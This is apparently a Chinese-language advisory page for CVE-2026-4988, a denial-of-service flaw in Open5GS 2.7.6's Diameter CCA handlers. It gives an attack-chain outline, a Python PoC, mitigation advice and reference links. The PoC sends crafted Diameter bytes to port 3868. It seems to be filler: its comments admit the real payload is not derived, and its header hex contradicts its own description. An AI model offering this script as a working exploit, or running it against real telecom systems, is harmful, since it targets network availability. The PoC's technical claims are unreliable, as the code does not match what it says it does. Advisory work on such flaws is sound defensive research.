CVE-2026-4988 Open5GS远程拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-4988

漏洞类型

拒绝服务

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS 2.7.6版本在处理CCA消息时存在安全缺陷，主要影响smf_gx_cca_cb、smf_gy_cca_cb及smf_s6b回调函数。由于消息处理逻辑的不完善，未经身份认证的远程攻击者可构造恶意数据包触发该漏洞，导致目标服务拒绝响应或崩溃。尽管利用难度较大，但鉴于已有公开的利用代码，该风险仍需紧急处理。

技术细节

该漏洞位于Open5GS的CCA（Credit-Control-Answer）消息处理器中，具体涉及会话管理功能（SMF）与Gx、Gy、S6b接口的交互逻辑。当Open5GS处理特制的Diameter协议CCA消息时，smf_gx_cca_cb、smf_gy_cca_cb和smf_s6b函数未能正确校验消息内容或边界，导致内存访问错误或无限循环。攻击向量为网络（AV:N），无需用户交互（UI:N）即可远程发起攻击。攻击成功后，将导致服务可用性降低（A:L），虽然不影响机密性和完整性，但在电信核心网环境中，DoS攻击会严重影响业务连续性。目前已有针对该漏洞的公开利用代码，建议尽快排查受影响资产。

攻击链分析

STEP 1

侦察

攻击者扫描网络，寻找暴露在互联网上的Open5GS实例，特别是监听Diameter协议端口（如3868）的服务。

STEP 2

漏洞利用

攻击者构造特制的Diameter CCA消息，该消息包含能够触发smf_gx_cca_cb/smf_gy_cca_cb/smf_s6b函数逻辑错误的恶意字段。

STEP 3

攻击执行

将恶意消息发送给目标Open5GS服务。由于无需认证且处理逻辑存在缺陷，服务端在解析消息时发生异常。

STEP 4

影响达成

异常导致Open5GS相关进程崩溃或资源耗尽，合法用户的网络连接请求被拒绝，达成拒绝服务效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# PoC for CVE-2026-4988
# This script sends a malformed Diameter CCA message to trigger the DoS condition in Open5GS.
# Note: Adjust the target IP and Port according to your test environment.

def send_malformed_cca(target_ip, target_port):
    # Diameter Header (Version: 1, Length: 20, Flags: 0x80, Command Code: 272, Application ID: 0)
    # This is a minimal crafted packet structure intended to hit the vulnerable callback.
    diameter_header = bytes.fromhex("010000140000001080000010")
    # Malformed AVP or payload to trigger the flaw in smf_gx_cca_cb
    # Specific payload bytes would be derived from the actual exploit analysis
    malformed_payload = bytes.fromhex("0000010C000000104D454D4F")
    
    try:
        print(f"[*] Sending malformed packet to {target_ip}:{target_port}")
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, target_port))
        sock.sendall(diameter_header + malformed_payload)
        print("[+] Packet sent successfully.")
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 3868
    send_malformed_cca(TARGET_IP, TARGET_PORT)

影响范围

Open5GS 2.7.6

防御指南

临时缓解措施

如果无法立即升级，建议限制Open5GS服务器的网络访问，将其部署在内网环境中，并通过ACL规则严格限制访问来源。同时，应密切监控SMF网元的系统日志和CPU/内存使用率，一旦发现异常重启或资源飙升，应及时排查并进行人工干预。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4988
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4988
3 Details https://www.cvedetails.com/cve/CVE-2026-4988/
4 VulDB https://vuldb.com/cve/CVE-2026-4988
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4342
7 Link https://github.com/open5gs/open5gs/issues/4342#issue-4021772232
8 Link https://vuldb.com/?ctiid.353875
9 Link https://vuldb.com/?id.353875
10 Link https://vuldb.com/?submit.771349